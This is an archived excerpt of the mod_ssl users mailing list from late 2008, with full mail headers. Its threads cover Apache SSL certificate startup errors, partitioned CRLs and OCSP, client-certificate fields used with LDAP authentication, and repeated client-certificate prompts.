informaci=C3=B3n comercial y/o personal por v=C3=ADa electr=C3=B3nica. Vd. =
podr=C3=A1 en cualquier=20
momento ejercer el derecho de acceso, rectificaci=C3=B3n, cancelaci=C3=B3n =
y oposici=C3=B3n en=20
los t=C3=A9rminos establecidos en la Ley Org=C3=A1nica de Protecci=C3=B3n d=
e Datos de Car=C3=A1cter=20
Personal (LOPD. 15/1999),  dirigiendo un escrito a C/ Rivero 31 1=C2=BA Izd=
a. - 33402=20
AVILES (Asturias), o a nuestra direcci=C3=B3n de correo electr=C3=B3nico=20
(info@defactops.com). Tambi=C3=A9n informamos que la informaci=C3=B3n inclu=
ida en este=20
e-mail es CONFIDENCIAL, siendo para uso exclusivo del destinatario arriba=20
mencionado. Si Usted lee este mensaje y no es el destinatario indicado, le=20
informamos que est=C3=A1 totalmente prohibida cualquier utilizaci=C3=B3n, d=
ivulgaci=C3=B3n,=20
distribuci=C3=B3n y/o reproducci=C3=B3n de esta comunicaci=C3=B3n sin autor=
izaci=C3=B3n expresa en=20
virtud de la legislaci=C3=B3n vigente.  Si ha recibido este mensaje por err=
or, le=20
rogamos nos lo notifique inmediatamente por esta misma v=C3=ADa y proceda a=
 su=20
eliminaci=C3=B3n.

This e-mail contains information that will be added to our computerised gue=
st=20
data base and will be trated in the strict confidence. If you wish to acces=
s,=20
correct, oppose or cancel your details, as specified the Law 15/99, Decembe=
r=20
13th, please send a certified letter to this effect to DE FACTO STANDARDS,=20
S.L.., (C/ Rivero 31 1=C2=BA Izda. - 33402 AVILES (Asturias) SPAIN). If you=
 read this=20
message, and is not the destinatary, we informal you that is forbidden anyt=
hing=20
utility, distribution, divulgation or reproduction of this communication wi=
thout=20
express authorization, of the present law.  If you received this message fo=
r=20
mistake, we proud in order to the present law, immediate communication to u=
s,=20
and please erase this e-mail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 20 11:10:05 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8CE2014DA54; Mon, 20 Oct 2008 11:10:05 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from fk-out-0910.google.com (fk-out-0910.google.com [209.85.128.184])
	by master.modssl.org (Postfix) with ESMTP id 4BACF14D82E
	for ; Mon, 20 Oct 2008 11:10:05 +0200 (CEST)
Received: by fk-out-0910.google.com with SMTP id f40so2349068fka.1
        for ; Mon, 20 Oct 2008 02:08:58 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from
         :user-agent:mime-version:to:subject:references:in-reply-to
         :x-enigmail-version:content-type;
        bh=ENXVl1wXNipWcZlLpuOBthTC42ea2alg1Z6vwij3OYQ=;
        b=p8uv/K5oI5JGDHl/HOgaOtgvFaiP1e6zvBsPKEiOzu3wEbLzNQeNLbqlcuTEQ2K8gY
         TfK7DlFwVXnfHSdz+BOup01FmacInXoRsFeTXXw0DIVG/pc42Zrct+/UAyHhXdIzi1Sk
         bjzGHdCQYuhZu443WJZjKxgpFU8qoSfTVZahw=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:user-agent:mime-version:to:subject:references
         :in-reply-to:x-enigmail-version:content-type;
        b=gKhEaQYistz1DREoWJuzwVzt+8+tgpnw8dcQkdlmx5zJjISQpN5G4wh4i6ptsZvVsK
         jE/8gdHT5tfojZ6tOtNWEqoUpYdVIs7VPgU9rAW6nnvam1iM4Vqrc5JjyoOwboq6lQI6
         07QsbnvqvpLtOM3oiu9FOc1Ss/w0xbSMnWS14=
Received: by 10.181.135.5 with SMTP id m5mr2569368bkn.33.1224493738077;
        Mon, 20 Oct 2008 02:08:58 -0700 (PDT)
Received: from ?192.168.12.147? (syloehb.pck.nerim.net [213.41.232.32])
        by mx.google.com with ESMTPS id z15sm7359659fkz.16.2008.10.20.02.08.56
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Mon, 20 Oct 2008 02:08:57 -0700 (PDT)
Message-ID: <48FC4AA8.4090505@gmail.com>
Date: Mon, 20 Oct 2008 11:08:56 +0200
From: Cuesta Gilles 
User-Agent: Thunderbird 2.0.0.12 (X11/20080213)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: unable to start apache with 2 certificates
References: <1224489345.2978.20.camel@localhost.localdomain>	 <48FC3E44.8020304@gmail.com>	 <1224491523.2978.29.camel@localhost.localdomain> <1224493385.2978.32.camel@localhost.localdomain>
In-Reply-To: <1224493385.2978.32.camel@localhost.localdomain>
X-Enigmail-Version: 0.95.7
Content-Type: multipart/signed; micalg=pgp-sha1;
 protocol="application/pgp-signature";
 boundary="------------enig86C293F550EB1B50FE59C7F0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cuesta Gilles 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig86C293F550EB1B50FE59C7F0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

Jorge Mart=C3=ADn Cuervo a =C3=A9crit :
> I tried with an SSLPassPhraseDialog in every VirtualHost and i get this=

> message:
>
> [jmartin@protean bin]$ ./apachectl -S
> Syntax error on line 82
> of /home/jmartin/apache22/conf/extra/httpd-ssl.conf:
> SSLPassPhraseDialog cannot occur within  section
>
> "or unciphered key ?" how can i do it? do i need to contact with my
> certificate provider?
>  =20
http://www.modssl.org/docs/2.8/ssl_faq.html#ToC31
Your key may be stored unciphered on your server.

--=20
Pourquoi Pierre Lescure a quitt=C3=A9 Canal? parce qu'il pensait cr=C3=A9=
er une marionette Chuck Norris dans les Guignols de l'info !!!
Gilles CUESTA - Logiciels Libres
69139920



--------------enig86C293F550EB1B50FE59C7F0
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFI/Eqo545quQSHen8RAjxFAKCcNPIAq4J+AW0FRh9H6k6i0PLzvgCeIQcS
wiLP6WjDON/ss2fFciqV0kQ=
=U3gB
-----END PGP SIGNATURE-----

--------------enig86C293F550EB1B50FE59C7F0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 21 11:51:46 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6961314DA33; Tue, 21 Oct 2008 11:51:46 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.173])
	by master.modssl.org (Postfix) with ESMTP id BF7B114D876
	for ; Tue, 21 Oct 2008 11:51:42 +0200 (CEST)
Received: by ug-out-1314.google.com with SMTP id k40so938321ugc.27
        for ; Tue, 21 Oct 2008 02:50:35 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to
         :subject:mime-version:content-type:content-transfer-encoding
         :content-disposition;
        bh=f2+Wi9jlz1jY743WRAEFdmdRea+i1UbLeOxfpJXeqDQ=;
        b=wVaw1QGEPgdqK1V2cchD4l1Szyoi7xGjlhd+lBQ8qT9Y2p124hfnw484hzn7cZNcrb
         uGIhg8Kvy6ItX1VXJUnnGJqZCPifMWF0P5h0txbkQHqEj5UPCGKSrnh6UnBDAC+22CFZ
         5sehO6r/lHvUbeel/9u8Vltyyb9j+d9YbAidY=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:mime-version:content-type
         :content-transfer-encoding:content-disposition;
        b=M4v3rJuZBtOaykq3f9EjeOzVM3FuMulbOuh8wrlQlSvr/UCme3taE2AYBqbnu0/uXI
         uohZCGEvwvyJQk/dXEsnSBMVghXE8UzdTMbBBs7F/hjjDup5IUbD9lvImJnJCdmVrrm5
         d93mKn7dVXMUHXJrSDj0DEgSrukratETrjejA=
Received: by 10.210.45.14 with SMTP id s14mr5982802ebs.72.1224582635241;
        Tue, 21 Oct 2008 02:50:35 -0700 (PDT)
Received: by 10.210.12.14 with HTTP; Tue, 21 Oct 2008 02:50:35 -0700 (PDT)
Message-ID: <2e5aeacb0810210250o110802f6w31b971872e9c8432@mail.gmail.com>
Date: Tue, 21 Oct 2008 10:50:35 +0100
From: "Nuno Ponte" 
To: modssl-users@modssl.org
Subject: Partitioned CRLs
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nuno Ponte" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

    Hi,

    We are running a CA that has thousands of revoked certificates,
which leads to CRLs of several MBytes.

    On the next nenewal of the CA, we are thinking of partitioning the
CRLs at each X number of issued certificates. The issued certificates
will have different CRL Distribution Points (CDP) according to the
partitions they are assigned.

    For example, for X=100, from certificate 1 to certificate 100, the
CDP would be http://myca.com/crl/myca-0001.crl, from certificate 101
to 200 the CDP would be http://myca.com/crl/myca-0002.crl, and so on.

    My question: Is mod_ssl/openssl prepared to support partitioned
CRLs like the way described? In particular, if CRLs are cached,
mod_ssl must be able to merge several different partitions according
to the CDP to create a unified view over the revocation universe of a
CA.

    Regards,

         Nuno Ponte
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 21 12:06:01 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4156E14DA33; Tue, 21 Oct 2008 12:06:01 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from fk-out-0910.google.com (fk-out-0910.google.com [209.85.128.186])
	by master.modssl.org (Postfix) with ESMTP id 9087414D876
	for ; Tue, 21 Oct 2008 12:05:58 +0200 (CEST)
Received: by fk-out-0910.google.com with SMTP id f40so2974012fka.1
        for ; Tue, 21 Oct 2008 03:04:51 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from
         :user-agent:mime-version:to:subject:references:in-reply-to
         :x-enigmail-version:content-type;
        bh=B2srHlz7R7BMN+sa/mwCZkoHyRmOE0cEs6Wor9bneY0=;
        b=u+vsgwOfTai1tA6pK/L073V7ZkIYz0/eHdBbTCsYodq9LV+qkSP37yCBT44p6iv0Z9
         46ApLuM3uJ6JnojgiMKOTTblO6faUB3VATkDBfAf6FnrhWVgmgiTFoF1YPG0WFnDEJjp
         3EKh6wpwjo8A3ARIwnDZ3aGRh54O7SUcISRMY=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:user-agent:mime-version:to:subject:references
         :in-reply-to:x-enigmail-version:content-type;
        b=kTfGDOiRgfl1UFwcrl9u56Ma92Cjmv6xQxlMN+NjYlVGdnslT8P7HAFDOseBeavo2o
         o0qFCjPEPnajiJiyr1mL/b78zSP+hp0jNWcq9FiZIoVc2eVicGa9ZpJQOplcc2pGwGkE
         hurDQtuQFxfW8IkCCTZvXJiVhfuOFxowVRvYA=
Received: by 10.181.48.4 with SMTP id a4mr2898902bkk.6.1224583490893;
        Tue, 21 Oct 2008 03:04:50 -0700 (PDT)
Received: from ?192.168.12.147? (syloehb.pck.nerim.net [213.41.232.32])
        by mx.google.com with ESMTPS id 28sm16253594fkx.1.2008.10.21.03.04.49
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Tue, 21 Oct 2008 03:04:50 -0700 (PDT)
Message-ID: <48FDA93D.4010107@gmail.com>
Date: Tue, 21 Oct 2008 12:04:45 +0200
From: Cuesta Gilles 
User-Agent: Thunderbird 2.0.0.12 (X11/20080213)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Partitioned CRLs
References: <2e5aeacb0810210250o110802f6w31b971872e9c8432@mail.gmail.com>
In-Reply-To: <2e5aeacb0810210250o110802f6w31b971872e9c8432@mail.gmail.com>
X-Enigmail-Version: 0.95.7
Content-Type: multipart/signed; micalg=pgp-sha1;
 protocol="application/pgp-signature";
 boundary="------------enig209E30A5C457ABCF5839B281"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cuesta Gilles 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig209E30A5C457ABCF5839B281
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

Nuno Ponte a =E9crit :
>     Hi,
>
>     We are running a CA that has thousands of revoked certificates,
> which leads to CRLs of several MBytes.
>
>     On the next nenewal of the CA, we are thinking of partitioning the
> CRLs at each X number of issued certificates. The issued certificates
> will have different CRL Distribution Points (CDP) according to the
> partitions they are assigned.
>
>     For example, for X=3D100, from certificate 1 to certificate 100, th=
e
> CDP would be http://myca.com/crl/myca-0001.crl, from certificate 101
> to 200 the CDP would be http://myca.com/crl/myca-0002.crl, and so on.
>  =20
CDP is embedded when creating certificate, so it might be possible
(client side).

Server side, you can stack as many crl as you want into either a single
file, or a directory (using hashing) and point to it into Apache.
But you may apply a patch for multiple identical DN handling.
http://marc.info/?l=3Dapache-httpd-dev&m=3D120350484626015&q=3Dp3

Why didn't you implement OCSP into Apache ?
http://sitola.fi.muni.cz/%7Etauceti/?download=3Docsp_apache_2.2.patch (I
didn't test it anyway)

--=20
La Joconde ne sourit pas devant Chuck Norris.
Gilles CUESTA - Logiciels Libres
69139920



--------------enig209E30A5C457ABCF5839B281
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFI/alB545quQSHen8RArdaAKC/atxsv5bQCcT/ApjxGAhQ79M3lQCg1bRy
FpdtiJSkPaI707hlF0XRswg=
=4Y96
-----END PGP SIGNATURE-----

--------------enig209E30A5C457ABCF5839B281--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 21 17:33:33 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5AC8914D9E4; Tue, 21 Oct 2008 17:33:33 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from ey-out-2122.google.com (ey-out-2122.google.com [74.125.78.24])
	by master.modssl.org (Postfix) with ESMTP id 1BB3314D876
	for ; Tue, 21 Oct 2008 17:33:30 +0200 (CEST)
Received: by ey-out-2122.google.com with SMTP id 4so841068eyf.1
        for ; Tue, 21 Oct 2008 08:32:23 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to
         :subject:in-reply-to:mime-version:content-type
         :content-transfer-encoding:content-disposition:references;
        bh=Zj+2aEWuRlcJuEgeEOS7lGbMEuD4nYls4g87AO4anXQ=;
        b=FjaCdJrBa3zazRelxjc8qLz6a0Bk12dPmHQXnoBZMG91KhICK7rk0QOV2TGDmEhqR7
         byVxqcnXvtOH64AtR+wloSZg444mPhEfAjuIGMvz9QmRZUhMulLFLAmB3IbH6paKzgSB
         8t54taBZioRxpCpPGs9OQF2qc/6s7HBzimRGY=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:in-reply-to:mime-version
         :content-type:content-transfer-encoding:content-disposition
         :references;
        b=o1ogciVwV0nnOCZZFKtYCl7OALMEvMAa5YhTO4hmz/pRJWGaZeG9XXMzF8GeuH18mT
         VolKpB0dMj4qc3Kh0SV55WWE5puGzJvOGU2R3oBiTw4yvSpxFwnhC19j/3uftHRinmY2
         K2gGPu9GqNTqKSBxmt+caBeywGfEGJuv+CGV0=
Received: by 10.210.52.15 with SMTP id z15mr10465044ebz.110.1224603142792;
        Tue, 21 Oct 2008 08:32:22 -0700 (PDT)
Received: by 10.210.12.14 with HTTP; Tue, 21 Oct 2008 08:32:22 -0700 (PDT)
Message-ID: <2e5aeacb0810210832p635588c7x744773dd1c75a791@mail.gmail.com>
Date: Tue, 21 Oct 2008 16:32:22 +0100
From: "Nuno Ponte" 
To: modssl-users@modssl.org
Subject: Re: Partitioned CRLs
In-Reply-To: <48FDA93D.4010107@gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <2e5aeacb0810210250o110802f6w31b971872e9c8432@mail.gmail.com>
	 <48FDA93D.4010107@gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nuno Ponte" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

    Hi Gilles,

    Thanks for your reply! :-)

    The CA also offers OCSP, which is obviously the preferred way to
validate certificate status. I am just trying to make sure that there
is support from the "applications world" to such a CRL partitioning
scheme. Wide interoperability is a key goal.

    Regards,

       Nuno Ponte


On Tue, Oct 21, 2008 at 11:04 AM, Cuesta Gilles  w=
rote:
> Nuno Ponte a =E9crit :
>>     Hi,
>>
>>     We are running a CA that has thousands of revoked certificates,
>> which leads to CRLs of several MBytes.
>>
>>     On the next nenewal of the CA, we are thinking of partitioning the
>> CRLs at each X number of issued certificates. The issued certificates
>> will have different CRL Distribution Points (CDP) according to the
>> partitions they are assigned.
>>
>>     For example, for X=3D100, from certificate 1 to certificate 100, the
>> CDP would be http://myca.com/crl/myca-0001.crl, from certificate 101
>> to 200 the CDP would be http://myca.com/crl/myca-0002.crl, and so on.
>>
> CDP is embedded when creating certificate, so it might be possible
> (client side).
>
> Server side, you can stack as many crl as you want into either a single
> file, or a directory (using hashing) and point to it into Apache.
> But you may apply a patch for multiple identical DN handling.
> http://marc.info/?l=3Dapache-httpd-dev&m=3D120350484626015&q=3Dp3
>
> Why didn't you implement OCSP into Apache ?
> http://sitola.fi.muni.cz/%7Etauceti/?download=3Docsp_apache_2.2.patch (I
> didn't test it anyway)
>
> --
> La Joconde ne sourit pas devant Chuck Norris.
> Gilles CUESTA - Logiciels Libres
> 69139920
>
>
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 27 14:48:59 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3578014DA2E; Mon, 27 Oct 2008 14:48:59 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ssx01.vapn.de (ssx01.vapn.de [62.156.166.53])
	by master.modssl.org (Postfix) with ESMTP id 8B63E14D866
	for ; Mon, 27 Oct 2008 14:48:58 +0100 (CET)
X-IronPort-AV: E=Sophos;i="4.33,492,1220220000"; 
   d="scan'208";a="84666895"
Received: from localhost (HELO ssi01_vpn.vapn.de) ([192.168.248.50])
  by sipm01.vapn.de with ESMTP; 27 Oct 2008 14:47:51 +0100
Received: from VAPS-NOTES-1.DE99995x.vw-group.com (unknown [10.45.121.2])
	by ssi01_vpn.vapn.de (Postfix) with ESMTP id 02AF46300E3
	for ; Mon, 27 Oct 2008 14:47:51 +0100 (CET)
To: modssl-users@modssl.org
Subject: mod_ssl Environment Variable?
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 5.0.11  July 24, 2002
Message-ID: 
From: Wilhelm.Greiner@vaps.de
Date: Mon, 27 Oct 2008 14:48:57 +0100
X-MIMETrack: Serialize by Router on VAPS-NOTES-1/VAPS/DE(Release 6.5.4|March 27, 2005) at
 27.10.2008 14:48:59,
	Serialize complete at 27.10.2008 14:48:59
Content-Type: multipart/alternative; boundary="=_alternative 004BCA4AC12574EF_="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Wilhelm.Greiner@vaps.de
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multipart message in MIME format.
--=_alternative 004BCA4AC12574EF_=
Content-Type: text/plain; charset="us-ascii"

Hello,

I would like to do the following (Apache 2.2 config):


 AuthUserFile /dev/null
 #SSLOptions +ExportCertData +FakeBasicAuth
 SSLOptions +FakeBasicAuth
 #SSLRequire (%{SSL_CLIENT_S_DN_O} in {"ClientO1", "ClientO2"})
 AuthLDAPURL "ldap://192.168.1.3:389/dc=testnet,dc=de?uid"
 AuthType Basic
 AuthName "Internal Server Content"
 #AuthBasicAuthoritative Off
 AuthBasicProvider ldap
 Require ldap-user %{SSL_CLIENT_S_DN_OU}


I want to use Client certificates, after Connect, one of the Fields
in the Certificate i will check (existance) in an ldap Server.


But in the apache Variable %{SSL_CLIENT_S_DN_OU} are not basicly the
OU String (testorg), there is a very long String, like this:

uid=/c=de/st=niedersachsen/o=ClientO1/ou=testorg/cn=maschinen/
emailaddress=support@testnet.de

With this string now apache askes the ldap Server, that seems all
correctly, but in the uid Field in my ldap is the Entry named
"testorg".

Is this an Error, that the Variable %{SSL_CLIENT_S_DN_OU} contains
ALL Client Cert Data and not the one requested (OU)?

Or is it like an perl hash and my syntax is simply wrong?

Wilhelm
--=_alternative 004BCA4AC12574EF_=
Content-Type: text/html; charset="us-ascii"



Hello,



I would like to do the following (Apache 2.2 config):



<Directory /var/www/desert/storage/jctmirrorserver/dav/Service42>

 AuthUserFile /dev/null

 #SSLOptions +ExportCertData +FakeBasicAuth

 SSLOptions +FakeBasicAuth

 #SSLRequire (%{SSL_CLIENT_S_DN_O} in {"ClientO1", "ClientO2"})

 AuthLDAPURL "ldap://192.168.1.3:389/dc=testnet,dc=de?uid"

 AuthType Basic

 AuthName "Internal Server Content"

 #AuthBasicAuthoritative Off

 AuthBasicProvider ldap

 Require ldap-user %{SSL_CLIENT_S_DN_OU}

</Directory>



I want to use Client certificates, after Connect, one of the Fields

in the Certificate i will check (existance) in an ldap Server.





But in the apache Variable %{SSL_CLIENT_S_DN_OU} are not basicly the

OU String (testorg), there is a very long String, like this:



uid=/c=de/st=niedersachsen/o=ClientO1/ou=testorg/cn=maschinen/

emailaddress=support@testnet.de



With this string now apache askes the ldap Server, that seems all

correctly, but in the uid Field in my ldap is the Entry named

"testorg".



Is this an Error, that the Variable %{SSL_CLIENT_S_DN_OU} contains

ALL Client Cert Data and not the one requested (OU)?



Or is it like an perl hash and my syntax is simply wrong?



Wilhelm
--=_alternative 004BCA4AC12574EF_=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 18 10:41:59 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A3DBF14D86E; Tue, 18 Nov 2008 10:41:59 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.e-siqia.de (mail.e-siqia.de [212.202.129.210])
	by master.modssl.org (Postfix) with ESMTP id 390CE14D82F
	for ; Tue, 18 Nov 2008 10:41:59 +0100 (CET)
Received: from localhost (unknown [127.0.0.1])
	by mail.e-siqia.de (Postfix) with ESMTP id 2CE75178042
	for ; Tue, 18 Nov 2008 09:43:22 +0000 (UTC)
Received: from mail.e-siqia.de ([127.0.0.1])
 by localhost (mail.e-siqia.de [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 16528-01 for ;
 Tue, 18 Nov 2008 10:43:11 +0100 (CET)
Received: from [192.168.111.125] (unknown [192.168.111.125])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by mail.e-siqia.de (Postfix) with ESMTP id 3649A17802F
	for ; Tue, 18 Nov 2008 10:43:11 +0100 (CET)
Message-ID: <49228D95.4030800@esiqia.com>
Date: Tue, 18 Nov 2008 10:40:37 +0100
From: wolfram eifler 
User-Agent: Icedove 1.5.0.14eol (X11/20080724)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Multiple Requests for Client Certificate
Content-Type: text/plain; charset=windows-1252; format=flowed
Content-Transfer-Encoding: 8bit
X-Virus-Scanned: by amavisd-new at e-siqia.de
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: wolfram eifler 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

hi,

i'm in the setup of a ssl-enabled apache2 server with mod_ssl - works
fine so far *but* when a client-browser opens multiple simulanous
connections for one page to the server the Client-Certificate gets
requested the same number of times from the user.

The corresponding Browser-Configuration for firefox for example is named
network.http.max-persistent-connections-per-server

I am looking for a way to avoid these multiple questions for a
client-cert but i have no influence on the Browser-Configurations.

Is there a way to avoid those multi-questions?

best regards

-- 
Mit freundlichen Grüßen

Wolfram Eifler
Entwicklung

Mail  wolfram.eifler@esiqia.com

e.siqia Informationstechnologien GmbH
Saarbrücker Str. 36
10405 Berlin
Tel. +49 30.284730-68
Fax  +49 30.284730-99
Support via Tel: +49 (9001) 374742 (*1
Support via Tel: +49 (9001) esiqia (*2

http://www.esiqia.com

Sitz: Berlin - Registergericht Berlin - AG Charlottenburg HRB 74684 - 
Geschäftsführer: Rainer Böhnke

*1 = 1,85€/min (Festnetz Telekom,Versatel)
*2 = 1,99€/min (Mobilfunk T-Com,Vodafone)

Aus Rechts- und Sicherheitsgründen ist die in dieser eMail gegebene 
Information nicht rechtsverbindlich. Eine rechtsverbindliche Bestätigung 
reichen wir Ihnen gerne auf Anforderung in schriftlicher Form oder per 
qualifizierter elektronischer Signatur nach. Diese Nachricht ist 
vertraulich und ausschließlich für den Adressaten bestimmt. Jeder 
Gebrauch durch Dritte ist verboten. Die Nachricht ist vor Versand auf 
Viren geprüft. Falls Sie die Daten irrtümlich erhalten haben, nehmen Sie 
bitte Kontakt mit dem Absender auf und löschen Sie die Daten auf jeden 
Computer und Datenträger.

For legal and security reasons this e-mail is not legally binding. 
However, we can on request provide you with legally binding written 
confirmation or with qualified electronical signed document at any time. 
This message is confidential and intended solely for the use by the 
adressee. The message is virus proofed before sending. Any use of this 
message by a third party is prohibited. If you received this message in 
error, please contact the sender and delete the data from any computer 
and data carrier. The sender is neither liable for the proper and 
complete transmission of the information in the message nor for any 
delay in its receipt.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 26 20:19:37 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F072F14D9EB; Wed, 26 Nov 2008 20:19:36 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail2.intuit.com (mail2.intuit.com [12.149.175.12])
	by master.modssl.org (Postfix) with ESMTP id 6093A14D833
	for ; Wed, 26 Nov 2008 20:19:35 +0100 (CET)
DomainKey-Signature: s=default; d=intuit.com; c=nofws; q=dns;
  h=X-SBRS:X-IronPort-AV:Received:Received:x-mimeole:
   Content-class:MIME-Version:Content-Type:
   Content-Transfer-Encoding:Subject:Date:Message-ID:
   X-MS-Has-Attach:X-MS-TNEF-Correlator:Thread-Topic:
   Thread-Index:From:To:Return-Path:X-OriginalArrivalTime;
  b=E8IKB0NMs0ZoR0G7q5nUaHf1uehnQbv2anEkFapAjzARcCDfxzdsXRtY
   tJU27ZbyMjQKh1raWGU8wrbM5mgnlOG7B2GO+oz9cwAjRqLpD2N2mN0uC
   jOJWXBh6627d7EH;
X-SBRS: None
X-IronPort-AV: E=Sophos;i="4.33,670,1220252400"; 
   d="scan'208";a="7238595"
Received: from relay-ex.sd.intuit.com (HELO sdgexbh04.corp.intuit.net) ([172.17.135.78])
  by mail2.sdg.ie.intuit.com with ESMTP; 26 Nov 2008 11:18:19 -0800
Received: from SDGEXEVS09.corp.intuit.net ([172.17.135.193]) by sdgexbh04.corp.intuit.net with Microsoft SMTPSVC(6.0.3790.3959);
	 Wed, 26 Nov 2008 11:18:19 -0800
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: Using multiple certs with mod_ssl behind load balancer
Date: Wed, 26 Nov 2008 11:18:19 -0800
